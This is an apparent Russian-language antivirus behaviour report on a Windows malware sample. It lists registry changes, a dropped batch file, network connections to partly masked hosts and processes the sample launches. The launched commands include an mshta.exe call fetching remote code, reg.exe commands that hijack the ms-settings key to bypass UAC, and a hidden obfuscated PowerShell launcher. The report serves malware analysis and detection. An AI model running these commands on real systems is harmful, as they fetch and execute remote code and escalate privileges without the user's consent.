Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Classes\ServiceHostXGRT\Shell\Open\Command] '' = '%TEMP%\r.bat'
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\mshta.exe' http://62.##.226.199/ext/test111
- '<SYSTEM32>\reg.exe' ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TEMP%\r.bat" /F
- '<SYSTEM32>\reg.exe' ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
- '<SYSTEM32>\reg.exe' DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
- '<SYSTEM32>\reg.exe' DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\r.bat
Сетевая активность
Подключается к
- '62.##.226.199':80
- 'th#.#arth.li':443
TCP
Запросы HTTP GET
- http://62.##.226.199/ext/test111
Другие
- 'th#.#arth.li':443
UDP
- DNS ASK th#.#arth.li
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -ep Unrestricted -nop $IRtTu = 'CECA99D6CDC9BCCAD9D2C7D8CDD3D284DAA8A6AFB68C8DDF9FD7C78488C9D2DA9EB8B1B4C0D692C6C5D88486CDCA84D2D3D884A8A9AAADB2A9A884ADB7C3B1B2B1BEA884D7C9D884ADB7C3B1B2B1... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_S...
- '<SYSTEM32>\cmd.exe' /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
